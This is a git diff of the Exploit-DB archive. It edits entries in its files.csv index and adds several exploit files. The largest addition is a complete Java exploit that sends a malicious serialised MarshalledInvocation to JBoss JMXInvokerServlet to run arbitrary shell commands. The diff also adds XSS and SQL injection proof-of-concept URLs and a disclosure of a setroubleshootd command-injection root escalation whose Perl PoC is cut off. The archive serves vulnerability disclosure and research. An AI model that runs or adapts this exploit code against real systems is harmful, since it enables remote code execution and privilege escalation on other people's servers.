diff --git a/files.csv b/files.csv index b2759eed5..ddb4ecfb6 100755 --- a/files.csv +++ b/files.csv @@ -5252,7 +5252,7 @@ id,file,description,date,author,platform,type,port 5626,platforms/php/webapps/5626.txt,"68 Classifieds 4.0 (category.php cat) SQL Injection Vulnerability",2008-05-15,HaCkeR_EgY,php,webapps,0 5627,platforms/php/webapps/5627.pl,"Pet Grooming Management System <= 2.0 - Arbitrary Add-Admin Exploit",2008-05-15,t0pP8uZz,php,webapps,0 5628,platforms/php/webapps/5628.txt,"RantX 1.0 Insecure Admin Authentication Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0 -5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 Insecure Cookie/Authentication Handling Vuln",2008-05-15,t0pP8uZz,php,webapps,0 +5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 - Insecure Cookie/Authentication Handling Vuln",2008-05-15,t0pP8uZz,php,webapps,0 5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities",2008-05-15,cOndemned,php,webapps,0 5632,platforms/multiple/remote/5632.rb,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (ruby)",2008-05-16,L4teral,multiple,remote,22 @@ -28757,7 +28757,7 @@ id,file,description,date,author,platform,type,port 31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0 31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php, SortBy param) - SQL Injection Vulnerability",2014-02-28,HauntIT,php,webapps,80 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0 -31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - (.cue) Stack Buffer Overflow Exploit",2014-02-28,"Juan Sacco",windows,local,0 +31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - (.cue) Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0 31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection Vulnerability",2014-03-01,Portcullis,windows,webapps,8080 31994,platforms/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Stored XSS Vulnerability",2014-03-01,Portcullis,windows,webapps,8080 @@ -30577,7 +30577,7 @@ id,file,description,date,author,platform,type,port 33949,platforms/linux/remote/33949.txt,"PCRE <= 6.2 Regular Expression Compiling Workspace Buffer Overflow Vulnerability",2010-05-06,"Michael Santos",linux,remote,0 33950,platforms/php/webapps/33950.txt,"HAWHAW 'newsread.php' SQL Injection Vulnerability",2010-01-31,s4r4d0,php,webapps,0 33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0 -33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,"Juan Sacco",php,webapps,80 +33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80 33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081 33957,platforms/php/webapps/33957.txt,"kloNews 2.0 - 'cat.php' Cross-Site Scripting Vulnerability",2010-01-20,"cr4wl3r ",php,webapps,0 33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 - 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0 @@ -31176,7 +31176,7 @@ id,file,description,date,author,platform,type,port 34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS image.php image Parameter XSS",2010-09-14,"Valentin Hoebel",php,webapps,0 34621,platforms/unix/remote/34621.c,"Mozilla Firefox <= 3.6.8 - 'Math.random()' Cross Domain Information Disclosure Vulnerability",2010-09-14,"Amit Klein",unix,remote,0 34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal Vulnerability",2010-09-15,"Bogdan Calin",windows,remote,0 -34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS Vulnerability",2014-09-11,"Juan Sacco",php,webapps,80 +34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS Vulnerability",2014-09-11,Provensec,php,webapps,80 34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,9900 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,0 @@ -31875,7 +31875,7 @@ id,file,description,date,author,platform,type,port 35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0 35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 Traceroute Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80 35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 Ping Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80 -35385,platforms/php/webapps/35385.pl,"Wordpress Plugin Slider Revolution/Showbiz Pro - Shell Upload Exploit",2014-11-26,"Simo Ben Youssef",php,webapps,80 +35385,platforms/php/webapps/35385.pl,"Wordpress Plugin Slider Revolution 3.0.95 /Showbiz Pro 1.7.1 - Shell Upload Exploit",2014-11-26,"Simo Ben Youssef",php,webapps,80 35386,platforms/linux/remote/35386.txt,"Logwatch Log File Special Characters Local Privilege Escalation Vulnerability",2011-02-24,"Dominik George",linux,remote,0 35387,platforms/php/webapps/35387.txt,"phpShop 0.8.1 - 'page' Parameter Cross-Site Scripting Vulnerability",2011-02-25,"Aung Khant",php,webapps,0 35391,platforms/php/webapps/35391.txt,"glFusion 1.1.x/1.2.1 - 'users.php' SQL Injection Vulnerability",2011-02-25,H3X,php,webapps,0 @@ -32760,8 +32760,8 @@ id,file,description,date,author,platform,type,port 36331,platforms/php/webapps/36331.txt,"Dolibarr ERP/CRM /user/index.php Multiple Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 36332,platforms/php/webapps/36332.txt,"Dolibarr ERP/CRM /user/info.php id Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 36333,platforms/php/webapps/36333.txt,"Dolibarr ERP/CRM /admin/boxes.php rowid Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 -36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0 -36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0 +36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion - Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0 +36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0 36336,platforms/windows/dos/36336.txt,"Microsoft Windows Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0 36337,platforms/linux/remote/36337.py,"ElasticSearch Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200 36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0 @@ -32841,7 +32841,7 @@ id,file,description,date,author,platform,type,port 36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation CSRF",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790 36420,platforms/windows/remote/36420.rb,"Adobe Flash Player PCRE Regex Vulnerability",2015-03-17,metasploit,windows,remote,0 36421,platforms/linux/remote/36421.rb,"Exim GHOST (glibc gethostbyname) Buffer Overflow",2015-03-18,"Qualys Corporation",linux,remote,25 -36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On Stack Overflow",2015-03-18,"Core Security",windows,dos,8000 +36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On - Stack Overflow",2015-03-18,"Core Security",windows,dos,8000 36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager Command Injection Vulnerability",2015-03-18,"Han Sahin",java,webapps,9447 36424,platforms/windows/local/36424.txt,"Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0 36425,platforms/linux/dos/36425.txt,"Linux Kernel Network Namespace Remote Denial of Service Vulnerability",2011-12-06,"Serge Hallyn",linux,dos,0 @@ -32850,7 +32850,7 @@ id,file,description,date,author,platform,type,port 36428,platforms/hardware/remote/36428.txt,"Axis M10 Series Network Cameras Cross Site Scripting Vulnerability",2011-12-07,"Matt Metzger",hardware,remote,0 36429,platforms/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 Web Interface Log Viewer Page URI XSS",2011-12-08,"Silent Dream",hardware,remote,0 36430,platforms/linux/local/36430.sh,"HP Application Lifestyle Management 11 'GetInstalledPackages' Local Privilege Escalation Vulnerability",2011-12-08,anonymous,linux,local,0 -36431,platforms/windows/dos/36431.pl,"FastStone Image Viewer 5.3 .tga Crash PoC",2015-03-19,"ITDefensor Vulnerability Research Team",windows,dos,0 +36431,platforms/windows/dos/36431.pl,"FastStone Image Viewer 5.3 - (.tga) Crash PoC",2015-03-19,"ITDefensor Vulnerability Research Team",windows,dos,0 36432,platforms/php/webapps/36432.txt,"Pet Listing 'preview.php' Cross Site Scripting Vulnerability",2011-12-09,Mr.PaPaRoSSe,php,webapps,0 36433,platforms/windows/dos/36433.txt,"Yahoo! CD Player ActiveX Control 'open()' Method Stack Buffer Overflow Vulnerability",2011-04-20,shinnai,windows,dos,0 36434,platforms/php/webapps/36434.txt,"WordPress GRAND FlAGallery Plugin 1.57 'flagshow.php' Cross Site Scripting Vulnerability",2011-12-12,Am!r,php,webapps,0 @@ -32918,11 +32918,11 @@ id,file,description,date,author,platform,type,port 36498,platforms/php/webapps/36498.txt,"Yaws 1.88 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0 36499,platforms/php/webapps/36499.txt,"StatIt 4 'statistik.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0 36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 Directory Traversal Vulnerability",2012-01-05,demonalex,windows,remote,0 -36501,platforms/windows/local/36501.py,"Mini-stream Ripper v2.7.7.100 Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 -36502,platforms/windows/local/36502.py,"RM Downloader 2.7.5.400 Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 -36503,platforms/hardware/remote/36503.rb,"QNAP admin shell via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,9993 -36504,platforms/hardware/remote/36504.rb,"QNAP Web Server Remote Code Execution via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,0 -36505,platforms/windows/remote/36505.txt,"WebGate eDVR Manager Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",windows,remote,0 +36501,platforms/windows/local/36501.py,"Mini-stream Ripper 2.7.7.100 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 +36502,platforms/windows/local/36502.py,"RM Downloader 2.7.5.400 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 +36503,platforms/hardware/remote/36503.rb,"QNAP - Admin Shell via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,9993 +36504,platforms/hardware/remote/36504.rb,"QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,0 +36505,platforms/windows/remote/36505.txt,"WebGate eDVR Manager - Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",windows,remote,0 36506,platforms/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps,0 36507,platforms/windows/remote/36507.txt,"Microsoft AntiXSS 3/4.0 Library Sanitization Module Security Bypass Vulnerability",2012-01-10,"Adi Cohen",windows,remote,0 36508,platforms/php/webapps/36508.txt,"VertrigoServ 2.25 'extensions.php' Script Cross Site Scripting Vulnerability",2012-01-05,"Stefan Schurtz",php,webapps,0 @@ -32934,10 +32934,10 @@ id,file,description,date,author,platform,type,port 36514,platforms/windows/remote/36514.pl,"IPtools 0.1.4 Remote Command Server Buffer Overflow Vulnerability",2012-01-06,demonalex,windows,remote,0 36515,platforms/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 Cross Site Scripting and SQL Injection Vulnerabilities",2012-01-07,"BHG Security Center",asp,webapps,0 36516,platforms/windows/remote/36516.py,"Acunetix <=9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote,0 -36517,platforms/windows/remote/36517.html,"WebGate WinRDS 2.0.8 StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 -36518,platforms/windows/remote/36518.html,"WebGate Control Center 4.8.7 GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 -36519,platforms/windows/remote/36519.html,"WebGate eDVR Manager 2.6.4 SiteName Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 -36520,platforms/php/webapps/36520.txt,"Berta CMS File Upload Bypass",2015-03-27,"Simon Waters",php,webapps,80 +36517,platforms/windows/remote/36517.html,"WebGate WinRDS 2.0.8 - StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 +36518,platforms/windows/remote/36518.html,"WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 +36519,platforms/windows/remote/36519.html,"WebGate eDVR Manager 2.6.4 - SiteName Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 +36520,platforms/php/webapps/36520.txt,"Berta CMS - File Upload Bypass",2015-03-27,"Simon Waters",php,webapps,80 36521,platforms/php/webapps/36521.txt,"Atar2b CMS 4.0.1 gallery_e.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 36522,platforms/php/webapps/36522.txt,"Atar2b CMS 4.0.1 pageH.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 36523,platforms/php/webapps/36523.txt,"Atar2b CMS 4.0.1 pageE.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 @@ -32950,6 +32950,7 @@ id,file,description,date,author,platform,type,port 36530,platforms/php/webapps/36530.txt,"ClipBucket 2.6 view_item.php type Parameter XSS",2012-01-09,YaDoY666,php,webapps,0 36531,platforms/php/webapps/36531.txt,"ClipBucket 2.6 videos.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0 36532,platforms/php/webapps/36532.txt,"ClipBucket 2.6 channels.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0 +36533,platforms/windows/local/36533.py,"IDM 6.20 - Local Buffer Overflow",2015-03-28,"TUNISIAN CYBER",windows,local,0 36534,platforms/php/webapps/36534.txt,"MARINET CMS room2.php roomid Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 36535,platforms/php/webapps/36535.txt,"MARINET CMS galleryphoto.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 36536,platforms/php/webapps/36536.txt,"MARINET CMS gallery.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 @@ -32958,6 +32959,30 @@ id,file,description,date,author,platform,type,port 36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 'users.php' Cross Site Scripting Vulnerability",2012-01-09,Am!r,php,webapps,0 36540,platforms/php/webapps/36540.txt,"WordPress Age Verification plugin 0.4 'redirect_to' Parameter URI Redirection Vulnerability",2012-01-10,"Gianluca Brindisi",php,webapps,0 36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 'downloads.php' Cross Site Scripting Vulnerability",2012-01-10,Am!r,php,webapps,0 +36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plug-in 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0 36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0 36544,platforms/php/webapps/36544.txt,"Kayako SupportSuite 3.x Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps,0 36545,platforms/linux/dos/36545.txt,"Linux Kernel <= 3.1.8 KVM Local Denial of Service Vulnerability",2011-12-29,"Stephan Sattler",linux,dos,0 +36546,platforms/windows/remote/36546.txt,"GreenBrowser 6.0.1002 - Search Bar Short Cut Button Double Free Remote Memory Corruption Vulnerability",2012-01-12,NCNIPC,windows,remote,0 +36547,platforms/asp/webapps/36547.txt,"MailEnable <= 6.02 'ForgottonPassword.aspx' Cross Site Scripting Vulnerability",2012-01-12,"Sajjad Pourali",asp,webapps,0 +36548,platforms/java/webapps/36548.txt,"Contus Job Portal 'Category' Parameter SQL Injection Vulnerability",2012-01-13,Lazmania61,java,webapps,0 +36549,platforms/php/webapps/36549.txt,"Joomla! HD Video Share Component 1.3 'id' Parameter SQL Injection Vulnerability",2012-01-12,Lazmania61,php,webapps,0 +36550,platforms/php/webapps/36550.txt,"PHP Membership Site Manager Script 2.1 'index.php' Cross Site Scripting Vulnerability",2012-01-16,Atmon3r,php,webapps,0 +36551,platforms/php/webapps/36551.txt,"PHP Ringtone Website 'ringtones.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-15,Atmon3r,php,webapps,0 +36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 +36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0 +36554,platforms/php/webapps/36554.txt,"Wordpress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0 +36555,platforms/windows/local/36555.c,"BZR Player 1.03 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0 +36556,platforms/windows/local/36556.c,"ZIP Password Recovery Professional 7.1 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0 +36557,platforms/windows/local/36557.txt,"HTTrack Website Copier 3.48-21 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0 +36558,platforms/windows/local/36558.txt,"UltraISO 9.6.2.3059 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0 +36559,platforms/php/webapps/36559.txt,"Wordpress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0 +36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,"Crash bandicot",php,webapps,0 +36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0 +36563,platforms/php/webapps/36563.txt,"Joomla Gallery WD - SQL Injection Vulnerability",2015-03-30,"Crash bandicot",php,webapps,0 +36564,platforms/linux/local/36564.txt,"Fedora21 setroubleshootd Local Root PoC",2015-03-30,"Sebastian Krahmer",linux,local,0 +36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 +36566,platforms/php/webapps/36566.txt,"Beehive Forum 101 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 +36567,platforms/php/webapps/36567.txt,"phpVideoPro 0.8.x/0.9.7 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 +36568,platforms/php/webapps/36568.txt,"Giveaway Manager 'members.php' Cross Site Scripting Vulnerability",2012-01-16,Am!r,php,webapps,0 +36569,platforms/php/webapps/36569.txt,"Annuaire PHP 'sites_inscription.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-16,Atmon3r,php,webapps,0 diff --git a/platforms/asp/webapps/36547.txt b/platforms/asp/webapps/36547.txt new file mode 100755 index 000000000..71ebacf02 --- /dev/null +++ b/platforms/asp/webapps/36547.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/51401/info + +MailEnable is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +The following MailEnable versions are vulnerable: +Professional, Enterprise, and Premium 4.26 and prior versions +Professional, Enterprise, and Premium 5.52 and prior versions +Professional, Enterprise, and Premium 6.02 and prior versions + +http://example.com/mewebmail/Mondo/lang/sys/ForgottenPassword.aspx?Username=[xss] \ No newline at end of file diff --git a/platforms/java/webapps/36548.txt b/platforms/java/webapps/36548.txt new file mode 100755 index 000000000..93ce9d06d --- /dev/null +++ b/platforms/java/webapps/36548.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/51404/info + +Contus Job Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/demo/jobresult?searchname=quickjobsearch&Keywords=&Location=&Category=16â??A \ No newline at end of file diff --git a/platforms/java/webapps/36553.java b/platforms/java/webapps/36553.java new file mode 100755 index 000000000..e7e9960cd --- /dev/null +++ b/platforms/java/webapps/36553.java @@ -0,0 +1,169 @@ +/* + * JBoss JMXInvokerServlet Remote Command Execution + * JMXInvoker.java v0.3 - Luca Carettoni @_ikki + * + * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...). + * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation" + * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console" + * and the "JMX Console" are protected or disabled. + * + * [FAQ] + * + * Q: Is my target vulnerable? + * A: If http://:8080/invoker/JMXInvokerServlet exists, it's likely exploitable + * + * Q: How to fix it? + * A: Enable authentication in "jmx-invoker-service.xml" + * + * Q: Is this exploit version-dependent? + * A: Unfortunately, yes. An hash value is used to properly invoke a method. + * At least comparing version 4.x and 5.x, these hashes are different. + * + * Q: How to compile and launch it? + * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java + * java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker + * Yes, it's a Java exploit. I can already see some of you complaining.... + */ + +import java.io.BufferedReader; +import java.io.IOException; +import java.io.InputStream; +import java.io.InputStreamReader; +import java.io.ObjectOutputStream; +import java.lang.reflect.Array; +import java.lang.reflect.Field; +import java.lang.reflect.Method; +import java.net.ConnectException; +import java.net.HttpURLConnection; +import java.net.URL; +import javax.management.MalformedObjectNameException; +import javax.management.ObjectName; +import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir) + +public class JMXInvokerServlet { + + //---------> CHANGE ME <--------- + static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1 + static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet"; + static final String cmd = "touch /tmp/exectest"; + //------------------------------- + + public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException { + + System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]"); + + //Create a malicious Java serialized object + MarshalledInvocation payload = new MarshalledInvocation(); + payload.setObjectName(new Integer(hash)); + + //Executes the MBean invoke operation + Class c = Class.forName("javax.management.MBeanServerConnection"); + Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class); + payload.setMethod(method); + + //Define MBean's name, operation and pars + Object myObj[] = new Object[4]; + //MBean object name + myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer"); + //Operation name + myObj[1] = new String("createScriptDeployment"); + //Actual parameters + myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"}; + //Operation signature + myObj[3] = new String[]{"java.lang.String", "java.lang.String"}; + + payload.setArguments(myObj); + System.out.println("\n--[*] MarshalledInvocation object created"); + //For debugging - visualize the raw object + //System.out.println(dump(payload)); + + //Serialize the object + try { + //Send the payload + URL server = new URL(url); + HttpURLConnection conn = (HttpURLConnection) server.openConnection(); + conn.setRequestMethod("POST"); + conn.setDoOutput(true); + conn.setDoInput(true); + conn.setUseCaches(false); + conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"); + conn.setRequestProperty("Connection", "keep-alive"); + conn.setRequestProperty("User-Agent", "Java/1.6.0_06"); + conn.setRequestProperty("Content-Type", "application/octet-stream"); + conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate"); + conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation"); + + ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream()); + wr.writeObject(payload); + System.out.println("\n--[*] MarshalledInvocation object serialized"); + System.out.println("\n--[*] Sending payload..."); + wr.flush(); + wr.close(); + + //Get the response + InputStream is = conn.getInputStream(); + BufferedReader rd = new BufferedReader(new InputStreamReader(is)); + String line; + StringBuffer response = new StringBuffer(); + while ((line = rd.readLine()) != null) { + response.append(line); + } + rd.close(); + + if (response.indexOf("Script Name") != -1) { + System.out.println("\n--[*] \"" + cmd + "\" successfully executed"); + } else { + System.out.println("\n--[!] An invocation error occured..."); + } + } catch (ConnectException cex) { + System.out.println("\n--[!] A connection error occured..."); + } catch (IOException ex) { + ex.printStackTrace(); + } + } + + /* + * Raw dump of generic Java Objects + */ + static String dump(Object o) { + StringBuffer buffer = new StringBuffer(); + Class oClass = o.getClass(); + + if (oClass.isArray()) { + buffer.append("["); + + for (int i = 0; i < Array.getLength(o); i++) { + if (i > 0) { + buffer.append(",\n"); + } + Object value = Array.get(o, i); + buffer.append(value.getClass().isArray() ? dump(value) : value); + } + buffer.append("]"); + } else { + buffer.append("{"); + while (oClass != null) { + Field[] fields = oClass.getDeclaredFields(); + for (int i = 0; i + < fields.length; i++) { + if (buffer.length() > 1) { + buffer.append(",\n"); + } + fields[i].setAccessible(true); + buffer.append(fields[i].getName()); + buffer.append("="); + try { + Object value = fields[i].get(o); + if (value != null) { + buffer.append(value.getClass().isArray() ? dump(value) : value); + } + } catch (IllegalAccessException e) { + } + } + oClass = oClass.getSuperclass(); + } + buffer.append("}"); + } + return buffer.toString(); + } +} diff --git a/platforms/linux/local/36564.txt b/platforms/linux/local/36564.txt new file mode 100755 index 000000000..71a6efc60 --- /dev/null +++ b/platforms/linux/local/36564.txt @@ -0,0 +1,109 @@ +setroubleshoot tries to find out which rpm a particular +file belongs to when it finds SELinux access violation reports. +The idea is probably to have convenient reports for the admin +which type enforcement rules have to be relaxed. setroubleshoot +runs as root (although in its own domain). In util.py +we have: + + +266 def get_rpm_nvr_by_file_path_temporary(name): +267 if name is None or not os.path.exists(name): +268 return None +269 +270 nvr = None +271 try: +272 import commands +273 rc, output = commands.getstatusoutput("rpm -qf '%s'" % name) +274 if rc == 0: +275 nvr = output +276 except: +277 syslog.syslog(syslog.LOG_ERR, "failed to retrieve rpm info for %s" % name) +278 return nvr + +(and other similar occurences) + +So. Yes, thats correct: The SELinux system that is only there to protect you, +passes attacker controlled data to sh -c (https://docs.python.org/2/library/commands.html) +inside a daemon running as root. Sacken lassen... + +I attached a PoC which uses networkmanager's openvpn plugin to execute +arbitraty commands by triggering an access violation to a pathname +which contains shell commands. + +The setroubleshootd_t domain has quite a lot of allowed rules and transitions, +so this can clearly count as privilege escalation. Furthermore a lot +of admins run their system in permissive mode (full root) even when +its shipped enforcing by default. + +Also note that there are potentially remote vectors, if attackers +can control part of the filenames being created (web uploads, git, scp, ftp etc). + +Sebastian + + +PS: I am all for SELinux but theres something on the wrong way. I counted +the LOC, and the core SELinux (kernel) has a smaller codebase than whats +framed around in python, running as root and mangling attacker controlled input. +IOW, the system that wants to protect you has fewer code enforcing the rules +than code that potentially blows up your system. And that code is python, +so let alone all the python modules and interpreter hat can have bugs on its own. +Driving such a lane _can only lead to abyss_. And I am not saying that evil +powers are creating an overly complex system to better hide their bugdoors +within. + +PPS: bug-logo will follow :) + +-- + +~ perl self.pl +~ $_='print"\$_=\47$_\47;eval"';eval +~ krahmer () suse de - SuSE Security Team + + +#!/usr/bin/perl + +# +# Fedora21 setroubleshootd local root PoC +# +# (C) 2015 Sebastian Krahmer +# +# - requires polkit authorization to add/mod VPN connections +# to NetworkManager (default on desktop user) +# - after execution of this script, which adds appropriate 